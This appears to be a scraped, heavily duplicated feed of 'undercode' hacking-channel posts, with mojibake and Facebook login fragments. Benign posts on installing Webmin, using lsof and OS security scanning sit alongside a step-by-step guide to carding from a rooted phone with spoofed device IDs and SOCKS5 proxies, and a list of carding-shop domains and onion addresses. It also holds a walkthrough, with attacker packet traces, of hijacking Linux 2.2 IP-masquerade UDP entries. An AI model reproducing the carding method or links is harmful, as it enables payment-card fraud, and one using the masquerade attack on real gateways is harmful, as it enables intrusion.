β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Compared with other GUI management tools, Webmin has the following significant advantages:
1) * Web management mode makes Webmin have both local and remote management capabilities;
2) * Plug-in structure makes Webmin has strong scalability and scalability. At present, the standard management module provided by Webmin almost covers common Unix management, and third-party management modules have also been continuously developed;
3) * Access control and SSL support provide sufficient security for remote management;
4) * Internationalization support, providing multi-language version
π¦ is installed Webmin
some linux distributions have been pre-installed Webmin, such as OpenLinux and soft Linux. If Webmin is not included in your Linux version, you can download Webmin's RPM package and TARBALL to install.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Compared with other GUI management tools, Webmin has the following significant advantages:
1) * Web management mode makes Webmin have both local and remote management capabilities;
2) * Plug-in structure makes Webmin has strong scalability and scalability. At present, the standard management module provided by Webmin almost covers common Unix management, and third-party management modules have also been continuously developed;
3) * Access control and SSL support provide sufficient security for remote management;
4) * Internationalization support, providing multi-language version
π¦ is installed Webmin
some linux distributions have been pre-installed Webmin, such as OpenLinux and soft Linux. If Webmin is not included in your Linux version, you can download Webmin's RPM package and TARBALL to install.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦The following are the installation steps of TAR BALL:
fb.com/undercodeTesting
1) * To install Webmin, you need to install perl5.0.6 or higher first. If perl is not installed on the target system, you need to download and install {perl-for-linux} from http://www.cpan.org, and you need to install commonly used perl modules; if you need Webmin to support SSL, you also need to install OpenSSL and perl modules Net :: SSLeay.
2) * Go to http://www.webmin.com/webmin to download webmin-0.91.tar.gz
3) * Unpack webmin-0.91.tar.gz to the directory where you want to install Webmin, such as / usr / local / webmin
4) * Run the installation script setup.pl. The installation process will ask the Webmin configuration file directory, Log directory and the system's listening port (default is 10000), and will also ask you to set an administrator password. The installation script also installs Webmin as the system's daemon, which starts automatically when the system is turned on.
5)* Restart the system and visit http: // localhost: 10000. If the login interface of Webmin appears, the installation is successful.
π¦ Webmin using UNIX system management
has already been said, all management functions are inserted in the form of a module in Webmin. Webmin categorizes various management modules. The main categories are: Webmin, systems, services, hardware and others. When you successfully log in and reach the homepage of Webmin, these categories will be displayed in front of you with different property pages. The following figure is the homepage of a Webmin server.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦The following are the installation steps of TAR BALL:
fb.com/undercodeTesting
1) * To install Webmin, you need to install perl5.0.6 or higher first. If perl is not installed on the target system, you need to download and install {perl-for-linux} from http://www.cpan.org, and you need to install commonly used perl modules; if you need Webmin to support SSL, you also need to install OpenSSL and perl modules Net :: SSLeay.
2) * Go to http://www.webmin.com/webmin to download webmin-0.91.tar.gz
3) * Unpack webmin-0.91.tar.gz to the directory where you want to install Webmin, such as / usr / local / webmin
4) * Run the installation script setup.pl. The installation process will ask the Webmin configuration file directory, Log directory and the system's listening port (default is 10000), and will also ask you to set an administrator password. The installation script also installs Webmin as the system's daemon, which starts automatically when the system is turned on.
5)* Restart the system and visit http: // localhost: 10000. If the login interface of Webmin appears, the installation is successful.
π¦ Webmin using UNIX system management
has already been said, all management functions are inserted in the form of a module in Webmin. Webmin categorizes various management modules. The main categories are: Webmin, systems, services, hardware and others. When you successfully log in and reach the homepage of Webmin, these categories will be displayed in front of you with different property pages. The following figure is the homepage of a Webmin server.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ The management of Webmin itself mainly includes:
1) * Module management: This part includes inserting a module, deleting a module, copying a module and resetting the category of the module. In addition, Webmin also provides the function of upgrading directly from the Internet.
2) * Interface style management: Webmin provides a variety of interface styles. KDE and Caldera interface styles are provided in version 0.91. Webmin's interface style is actually a module, you can insert a new interface style. In addition, you can also modify some Webmin interface parameters, such as page background color, table background color, etc.
3) * Internationalization support: A great feature of Webmin is to provide multi-language support. The languages ββcurrently supported by Webmin are: English, French, German, Italian, Chinese, Japanese, Korean and other languages.
4) * Webmin server group: Webmin also provides the function of discovering and managing multiple Webmin servers, which provides great convenience for managing multiple UNIX servers at the same time.
5) * Activity log: Webmin's activity log is mainly used for audit system management activities.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ The management of Webmin itself mainly includes:
1) * Module management: This part includes inserting a module, deleting a module, copying a module and resetting the category of the module. In addition, Webmin also provides the function of upgrading directly from the Internet.
2) * Interface style management: Webmin provides a variety of interface styles. KDE and Caldera interface styles are provided in version 0.91. Webmin's interface style is actually a module, you can insert a new interface style. In addition, you can also modify some Webmin interface parameters, such as page background color, table background color, etc.
3) * Internationalization support: A great feature of Webmin is to provide multi-language support. The languages ββcurrently supported by Webmin are: English, French, German, Italian, Chinese, Japanese, Korean and other languages.
4) * Webmin server group: Webmin also provides the function of discovering and managing multiple Webmin servers, which provides great convenience for managing multiple UNIX servers at the same time.
5) * Activity log: Webmin's activity log is mainly used for audit system management activities.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Security of Webmin secure your as well !
t.me/undercodeTesting
Because Webmin is a Web-based management tool, so the importance of Webmin itself secure self-evident. Webmin's security is mainly reflected in the following three aspects:
1) * SSL support: By setting Webmin to support SSL, you can access Webmin through https. SSL not only authenticates your Webmin server, but also encrypts network communications during management.
2) * User access control: User access control enables administrators to control which users can access each module, and what operations users who access a certain module can perform on the module.
3) * IP access control: IP access control can limit which IP addresses can access this Webmin server, and access to IP addresses not in the access list will be prohibited.
π¦Through these security enhancements, you can safely use Webmin as your system management tool.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Security of Webmin secure your as well !
t.me/undercodeTesting
Because Webmin is a Web-based management tool, so the importance of Webmin itself secure self-evident. Webmin's security is mainly reflected in the following three aspects:
1) * SSL support: By setting Webmin to support SSL, you can access Webmin through https. SSL not only authenticates your Webmin server, but also encrypts network communications during management.
2) * User access control: User access control enables administrators to control which users can access each module, and what operations users who access a certain module can perform on the module.
3) * IP access control: IP access control can limit which IP addresses can access this Webmin server, and access to IP addresses not in the access list will be prohibited.
π¦Through these security enhancements, you can safely use Webmin as your system management tool.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ FULL WEB ADMIN TUTORIALS & TIPS BY UNDERCODE
in our training program all those things are pratical ;) π
in our training program all those things are pratical ;) π
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ SCAMMER cc sellet Site list. !!!!π«π«π«π«π«ββββββββ
All Site is selling 95%dead cc.
π¦ Scammer Site.....don t open :
uniccshop.bazar
βBANKOMATβ
Normal Link: Bankomat.cc
Tor Link : https://bankomatccor3gum.onion
βUNICCβ
Normal Link : Unicc.cm /(Important) uniccshop.bazar/
Tor Link : Uniccxide6hker6y.onion
valcc.bazar
βVALIDCCβ
Normal Link : Validcc.name
Normal Link : Validcc.vc
Normal Link : Validcc.tw
Normal Link : Validcc.bz
Tor Link : VALIDCVVMTWP25N5.ONION
Tor Link : VALIDCCVLSSFDGAS.ONION
Tor Link : HU5IYZFPEYIFE46M.ONION
βFESHOPβ
Normal Link : http://fe-acc18.ru/store/index.php
Normal Link :FE-ACC18.RU
Tor Link : hdjd6wv7hjngjhkb.onion
βJSTASHβ
Normal Link : jstash.bazar/
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ SCAMMER cc sellet Site list. !!!!π«π«π«π«π«ββββββββ
All Site is selling 95%dead cc.
π¦ Scammer Site.....don t open :
uniccshop.bazar
βBANKOMATβ
Normal Link: Bankomat.cc
Tor Link : https://bankomatccor3gum.onion
βUNICCβ
Normal Link : Unicc.cm /(Important) uniccshop.bazar/
Tor Link : Uniccxide6hker6y.onion
valcc.bazar
βVALIDCCβ
Normal Link : Validcc.name
Normal Link : Validcc.vc
Normal Link : Validcc.tw
Normal Link : Validcc.bz
Tor Link : VALIDCVVMTWP25N5.ONION
Tor Link : VALIDCCVLSSFDGAS.ONION
Tor Link : HU5IYZFPEYIFE46M.ONION
βFESHOPβ
Normal Link : http://fe-acc18.ru/store/index.php
Normal Link :FE-ACC18.RU
Tor Link : hdjd6wv7hjngjhkb.onion
βJSTASHβ
Normal Link : jstash.bazar/
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Network configuration-what listener is running on a port :
t.me/undercodeTesting
π¦ When we use netstat -an, we can sometimes see similar output :
Udp 0 0 0.0.0.0:32768 0.0.0.0:*
But there is no description about this port in / etc / services, what should I do? Is this a hacking program?
Is there a way to see what program is listening on this port?
π¦Use lsof -i: 32768 to see:
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
rpc.statd 603 root 4u IPv4 953 UDP *: 32768
rpc.statd 603 root 6u IPv4 956 TCP *: 32768 (LISTEN)
turned out to be rpc program of.
π¦Use lsof -i: port to see the program running on the specified port, as well as the current connection.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Network configuration-what listener is running on a port :
t.me/undercodeTesting
π¦ When we use netstat -an, we can sometimes see similar output :
Udp 0 0 0.0.0.0:32768 0.0.0.0:*
But there is no description about this port in / etc / services, what should I do? Is this a hacking program?
Is there a way to see what program is listening on this port?
π¦Use lsof -i: 32768 to see:
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
rpc.statd 603 root 4u IPv4 953 UDP *: 32768
rpc.statd 603 root 6u IPv4 956 TCP *: 32768 (LISTEN)
turned out to be rpc program of.
π¦Use lsof -i: port to see the program running on the specified port, as well as the current connection.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Requirement of Carding Done Through Mobile Requirements:
A) rooted phone.
B) install the following apps;-
1. IMEI changer
2. Phone ID changer
3. Android ID changer
4. Proxy Droid
5. CCleaner Procedure;-
π¦ > Use SOCK5 proxy with Proxy Droid apps.
> You need to change IMEI, Android ID etc before you start carding
> Use CC cleaner to Clean Android Mess and Now connect to your proxy droid with SOCKS5 proxy and connect it.
> Now follow all steps of carding TUTS as you do on PC with mentioned aboveβ¦
> Ok, so you got your cc, your drop and try to be Anonymous as you can make yourself. PS
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Requirement of Carding Done Through Mobile Requirements:
A) rooted phone.
B) install the following apps;-
1. IMEI changer
2. Phone ID changer
3. Android ID changer
4. Proxy Droid
5. CCleaner Procedure;-
π¦ > Use SOCK5 proxy with Proxy Droid apps.
> You need to change IMEI, Android ID etc before you start carding
> Use CC cleaner to Clean Android Mess and Now connect to your proxy droid with SOCKS5 proxy and connect it.
> Now follow all steps of carding TUTS as you do on PC with mentioned aboveβ¦
> Ok, so you got your cc, your drop and try to be Anonymous as you can make yourself. PS
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to evaluate OS security ? full written by undercode
instagram.com/undercodeTesting
π¦ππΌπ' π πππΈβπ
---- With the development of the network, enterprises are connecting their local area networks to wide area networks or connecting their internal networks to the Internet. This gives more and more people (internal and external) access to internal network resources. As a result of this exposure, companies urgently need to address network security issues.
---- A major part of providing effective security is to evaluate how well the existing security mechanism is integrated with the enterprise's network security strategy-that is, to judge whether the security strategy is effectively implemented. The increasing complexity of the network makes the implementation of security policies more and more difficult.
---- Evaluating the effectiveness of each network security component is necessary to ensure effective network security. The two main components that provide network security are: firewall and operating system (OS).
---- Many companies put their energies on the firewall, and according to the report provided by Aberdeen Group, the most easily overlooked security vulnerabilities are those that exist in the operating environment. Some vendors are committed to providing reliable versions of the operating environment, while most only provide optional, installable security services.
---- The operating system's security mechanism helps protect the machine running the OS from unauthorized access. Special protection for unauthorized access to specific information, specific machine instructions, and UNIX superuser instructions within the machine. Most firewalls and the Internet itself are built on a standard, unsecured UNIX operating environment. This is why everyone is not surprised by the existence of security threats. UNIX is very insecure, it is difficult to configure, and configuration errors may cause vulnerabilities.
---- The following two factors make the OS security mechanism very important:
---- (1) A second line of defense is provided behind the firewall. Hackers often break through or bypass firewalls, and OS security policies can effectively protect the system and prevent such external intruders.
---- (2) Defense against intruders in the enterprise. Internal intruders are already inside the firewall, and the FBI report indicates that more than 60% of computer crimes come from inside the enterprise. In most cases, the offenders are those resentful employees or contractors.
---- Evaluating OS security is quite difficult, especially UNIX, because it has many variants and vendors. Assessing the security of a UNIX system requires mastering the following three aspects:
---- (1) UNIX system settings
---- (2) Weaknesses caused by different versions of UNIX applications, including sending mail, FTP, NFS (Network File System) and TFTP (Simple File Transfer Protocol)
---- (3) Provided by different manufacturers Security patches-The
operating system is constantly patching BUGS and adding features to make the evaluation more complicated. These updates introduce new security vulnerabilities. What is needed at this time is a method for automatically evaluating operating system vulnerabilities and automatically implementing security policies. Only in this way can the gap between security strategy and security implementation be effectively assessed and shortened.
---- OS security scanning? The document just provides the required solution. The scanning software runs on each machine and probes each machine through a series of tests to dig out potential weaknesses. This software evaluates the stand-alone security environment from the perspective of the operating system and generates a detailed report of the vulnerabilities it finds, and proposes solutions.
π¦How to evaluate OS security ? full written by undercode
instagram.com/undercodeTesting
π¦ππΌπ' π πππΈβπ
---- With the development of the network, enterprises are connecting their local area networks to wide area networks or connecting their internal networks to the Internet. This gives more and more people (internal and external) access to internal network resources. As a result of this exposure, companies urgently need to address network security issues.
---- A major part of providing effective security is to evaluate how well the existing security mechanism is integrated with the enterprise's network security strategy-that is, to judge whether the security strategy is effectively implemented. The increasing complexity of the network makes the implementation of security policies more and more difficult.
---- Evaluating the effectiveness of each network security component is necessary to ensure effective network security. The two main components that provide network security are: firewall and operating system (OS).
---- Many companies put their energies on the firewall, and according to the report provided by Aberdeen Group, the most easily overlooked security vulnerabilities are those that exist in the operating environment. Some vendors are committed to providing reliable versions of the operating environment, while most only provide optional, installable security services.
---- The operating system's security mechanism helps protect the machine running the OS from unauthorized access. Special protection for unauthorized access to specific information, specific machine instructions, and UNIX superuser instructions within the machine. Most firewalls and the Internet itself are built on a standard, unsecured UNIX operating environment. This is why everyone is not surprised by the existence of security threats. UNIX is very insecure, it is difficult to configure, and configuration errors may cause vulnerabilities.
---- The following two factors make the OS security mechanism very important:
---- (1) A second line of defense is provided behind the firewall. Hackers often break through or bypass firewalls, and OS security policies can effectively protect the system and prevent such external intruders.
---- (2) Defense against intruders in the enterprise. Internal intruders are already inside the firewall, and the FBI report indicates that more than 60% of computer crimes come from inside the enterprise. In most cases, the offenders are those resentful employees or contractors.
---- Evaluating OS security is quite difficult, especially UNIX, because it has many variants and vendors. Assessing the security of a UNIX system requires mastering the following three aspects:
---- (1) UNIX system settings
---- (2) Weaknesses caused by different versions of UNIX applications, including sending mail, FTP, NFS (Network File System) and TFTP (Simple File Transfer Protocol)
---- (3) Provided by different manufacturers Security patches-The
operating system is constantly patching BUGS and adding features to make the evaluation more complicated. These updates introduce new security vulnerabilities. What is needed at this time is a method for automatically evaluating operating system vulnerabilities and automatically implementing security policies. Only in this way can the gap between security strategy and security implementation be effectively assessed and shortened.
---- OS security scanning? The document just provides the required solution. The scanning software runs on each machine and probes each machine through a series of tests to dig out potential weaknesses. This software evaluates the stand-alone security environment from the perspective of the operating system and generates a detailed report of the vulnerabilities it finds, and proposes solutions.
---- System Security Scanner (S3) from ISS is a security assessment tool that facilitates the management and implementation of security policies. It enables companies to implement security policies across heterogeneous operating platforms. Currently, S3 supports most popular UNIX versions, including Linux, SunOS4.1.3, Solaris, HP-UX, and AIX. It helps companies to automatically conduct security assessment and maintenance on their operating system platforms. With this effective tool, companies can make full use of the potential of the network and continuously enhance their competitivenessβwithout worrying about security.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ SECURITY KERNEL TIPS BY UNDERCODE :
FB.com/undercodeTesting
π¦ππΌπ' π πππΈβπ
1) kernel IP camouflage has security holes
There are serious security holes in the implementation of IP disguise of Linux system 2.2.x kernel. There is a lack of serious inspection of the connection in the relevant core code. The attacker can rewrite the UDP disguise entry in the core so that the attacker's UDP packet can be routed into the internal machine.
2) When an internal IP wants to access the DNS server of the external network, when the sent UDP packet passes through the IP masquerading gateway, the kernel adds an entry to record the connection. For example, a UDP packet connected from port 1035 of internal host A to port 53 of external host C. The kernel replaces the source address of this packet with the IP of the disguised gateway (B). Port, the default is from 61000 port to 65096 port, so in theory, the core can handle 4096 TCP / UDP camouflage connections at the same time.
Host A: 1035-> GW B: 63767-> Host C: 53When
3) an external network sends a UDP packet to a disguised gateway, Linux IP disguise only decides whether this UDP packet should be forwarded to the internal network based on the target port. If the target port has a corresponding entry in the established camouflage connection table, it will update the source ip and source port in this packet to the remote host ip and port of the corresponding entry. As long as the attacker judges the port of the masquerading gateway, he may use his own IP and port to rewrite the masquerading connection table. The port range used by the masquerade gateway to serve masquerade connections is usually from 61000 to 65096, so it is easy for external attackers to determine which ports have been used to establish connections. An attacker can send UDP detection packets to these ports disguised as a gateway, and then check the IP ID of the port's ICMP response packets. Each host sends a packet, the IP ID in its TCP / IP stack will increase by one. Therefore, the ICMP response sent to the port used for IP masquerading will have the IP ID of the internal host.
4) This ID will usually be much different from the current IP ID of the gateway host, usually above 1000. The following example shows the process of exploiting weaknesses:
π¦Host A is an internal host (192.168.1.100)
Host B is a disguised gateway (192.168.1.1 / 10.0.0.1)
Host C is an external DNS server (10.0.0.25).
Host X is an external attacker's IP (10.10.187.13)
. Before the detection, execute the command written by undercode in the disguised gateway: ipchains -L -M -n to display the current disguised connection table Situation:
> UDP 03: 39.21 192.168.1.100 10.0.0.25 1035 (63767)-> 53
is currently a connection sent from port 1035 of 192.168.1.100 to port 53 of 10.0.0.25, the masquerading port is 63767
[from the attacker βs The result of tcpdump on the machine]
(To make it easier to see the problem, here we set the source port of all detection packets to 12345)
[Our detection will start from port 61000, we omitted some of the previous results]
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63762 unreachable [tos 0xd8] (ttl 245, id 13135)
10.10.187.13.12345> 10.0.0.1.63763: udp 0 (DF) [tos 0x18] ( ttl 254, id 23069)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63763 unreachable [tos 0xd8] (ttl 245, id 13136)
10.10.187.13.12345> 10.0.0.1.63764: udp 0 (DF ) [tos 0x18] (ttl 254, id 23070)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63764 unreachable [tos 0xd8] (ttl 245, id 13137)
10.10.187.13.12345> 10.0.0.1.63765: udp 0 (DF) [tos 0x18] ( ttl 254, id 23071)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63765 unreachable [tos 0xd8] (ttl 245, id 13138)
10.10.187.13.12345> 10.0.0.1.63766: udp 0 (DF ) [tos 0x18] (ttl 254, id 23074)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63766 unreachable [tos 0xd8] (ttl 245, id 13139)
10.10.187.13.12345> 10.0.0.1. 63 767: 0 UDP (the DF) [TOS 0x18] (TTL 254, ID 23083)
π¦ SECURITY KERNEL TIPS BY UNDERCODE :
FB.com/undercodeTesting
π¦ππΌπ' π πππΈβπ
1) kernel IP camouflage has security holes
There are serious security holes in the implementation of IP disguise of Linux system 2.2.x kernel. There is a lack of serious inspection of the connection in the relevant core code. The attacker can rewrite the UDP disguise entry in the core so that the attacker's UDP packet can be routed into the internal machine.
2) When an internal IP wants to access the DNS server of the external network, when the sent UDP packet passes through the IP masquerading gateway, the kernel adds an entry to record the connection. For example, a UDP packet connected from port 1035 of internal host A to port 53 of external host C. The kernel replaces the source address of this packet with the IP of the disguised gateway (B). Port, the default is from 61000 port to 65096 port, so in theory, the core can handle 4096 TCP / UDP camouflage connections at the same time.
Host A: 1035-> GW B: 63767-> Host C: 53When
3) an external network sends a UDP packet to a disguised gateway, Linux IP disguise only decides whether this UDP packet should be forwarded to the internal network based on the target port. If the target port has a corresponding entry in the established camouflage connection table, it will update the source ip and source port in this packet to the remote host ip and port of the corresponding entry. As long as the attacker judges the port of the masquerading gateway, he may use his own IP and port to rewrite the masquerading connection table. The port range used by the masquerade gateway to serve masquerade connections is usually from 61000 to 65096, so it is easy for external attackers to determine which ports have been used to establish connections. An attacker can send UDP detection packets to these ports disguised as a gateway, and then check the IP ID of the port's ICMP response packets. Each host sends a packet, the IP ID in its TCP / IP stack will increase by one. Therefore, the ICMP response sent to the port used for IP masquerading will have the IP ID of the internal host.
4) This ID will usually be much different from the current IP ID of the gateway host, usually above 1000. The following example shows the process of exploiting weaknesses:
π¦Host A is an internal host (192.168.1.100)
Host B is a disguised gateway (192.168.1.1 / 10.0.0.1)
Host C is an external DNS server (10.0.0.25).
Host X is an external attacker's IP (10.10.187.13)
. Before the detection, execute the command written by undercode in the disguised gateway: ipchains -L -M -n to display the current disguised connection table Situation:
> UDP 03: 39.21 192.168.1.100 10.0.0.25 1035 (63767)-> 53
is currently a connection sent from port 1035 of 192.168.1.100 to port 53 of 10.0.0.25, the masquerading port is 63767
[from the attacker βs The result of tcpdump on the machine]
(To make it easier to see the problem, here we set the source port of all detection packets to 12345)
[Our detection will start from port 61000, we omitted some of the previous results]
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63762 unreachable [tos 0xd8] (ttl 245, id 13135)
10.10.187.13.12345> 10.0.0.1.63763: udp 0 (DF) [tos 0x18] ( ttl 254, id 23069)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63763 unreachable [tos 0xd8] (ttl 245, id 13136)
10.10.187.13.12345> 10.0.0.1.63764: udp 0 (DF ) [tos 0x18] (ttl 254, id 23070)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63764 unreachable [tos 0xd8] (ttl 245, id 13137)
10.10.187.13.12345> 10.0.0.1.63765: udp 0 (DF) [tos 0x18] ( ttl 254, id 23071)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63765 unreachable [tos 0xd8] (ttl 245, id 13138)
10.10.187.13.12345> 10.0.0.1.63766: udp 0 (DF ) [tos 0x18] (ttl 254, id 23074)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63766 unreachable [tos 0xd8] (ttl 245, id 13139)
10.10.187.13.12345> 10.0.0.1. 63 767: 0 UDP (the DF) [TOS 0x18] (TTL 254, ID 23083)
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
10.0.0.1> 10.10.187.13: ICMP: 10.0.0.1 unreachable The UDP Port 63767 [TOS 0xD8] (TTL 244, ID 17205)
^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^
The ID of the above package is 17205, and its difference from 13139 has exceeded 4000, which means that we found a pretended connection. !!!
10.10.187.13.12345> 10.0.0.1.63768: udp 0 (DF) [tos 0x18] (ttl 254, id 23084)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63768 unreachable [tos 0xd8] (ttl 245, id 13140)
10.10.187.13.12345> 10.0.0.1.63769: udp 0 (DF) [tos 0x18] (ttl 254, id 23088)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63769 unreachable [tos 0xd8] (ttl 245, id 13141)
10.10.187.13.12345> 10.0.0.1.63770: udp 0 (DF) [tos 0x18] (ttl 254, id 23090)
10.0.0.1> 10.10.187.13 : icmp: 10.0.0.1 udp port 63770 unreachable [tos 0xd8] (ttl 245, id
13142 ) 10.10.187.13.12345> 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, id 23091)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63771 unreachable [tos 0xd8] (ttl 245, id 13143)
10.10.187.13.12345> 10.0.0.1.63771: udp 0 (DF) [tos 0x18] ( ttl 254, id 23092)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63772 unreachable [tos 0xd8] (ttl 245, id 13144)
[our detected end of port 65096, we have omitted some results]
now Let's check the situation of the masquerading connection table of the masquerading gateway:
ipchains -L -M -n
> UDP 04: 35.12 192.168.1.100 10.10.187.13 1035 (63767)-> 12345
You can see that the remote host has been replaced by an attack The ip of the attacker is 10.10.187.13, and the target port is also replaced by the source port used for attacker detection: 12345.
Now the attacker can send UDP data from the source port 12345 to port 1035 of the internal host.
π¦Suggestion:
A possible solution to the problem of accessing external DNS is to set it on a disguised gateway A cached domain name server, and then prohibit the disguise of UDP packets.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^
The ID of the above package is 17205, and its difference from 13139 has exceeded 4000, which means that we found a pretended connection. !!!
10.10.187.13.12345> 10.0.0.1.63768: udp 0 (DF) [tos 0x18] (ttl 254, id 23084)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63768 unreachable [tos 0xd8] (ttl 245, id 13140)
10.10.187.13.12345> 10.0.0.1.63769: udp 0 (DF) [tos 0x18] (ttl 254, id 23088)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63769 unreachable [tos 0xd8] (ttl 245, id 13141)
10.10.187.13.12345> 10.0.0.1.63770: udp 0 (DF) [tos 0x18] (ttl 254, id 23090)
10.0.0.1> 10.10.187.13 : icmp: 10.0.0.1 udp port 63770 unreachable [tos 0xd8] (ttl 245, id
13142 ) 10.10.187.13.12345> 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, id 23091)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63771 unreachable [tos 0xd8] (ttl 245, id 13143)
10.10.187.13.12345> 10.0.0.1.63771: udp 0 (DF) [tos 0x18] ( ttl 254, id 23092)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63772 unreachable [tos 0xd8] (ttl 245, id 13144)
[our detected end of port 65096, we have omitted some results]
now Let's check the situation of the masquerading connection table of the masquerading gateway:
ipchains -L -M -n
> UDP 04: 35.12 192.168.1.100 10.10.187.13 1035 (63767)-> 12345
You can see that the remote host has been replaced by an attack The ip of the attacker is 10.10.187.13, and the target port is also replaced by the source port used for attacker detection: 12345.
Now the attacker can send UDP data from the source port 12345 to port 1035 of the internal host.
π¦Suggestion:
A possible solution to the problem of accessing external DNS is to set it on a disguised gateway A cached domain name server, and then prohibit the disguise of UDP packets.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β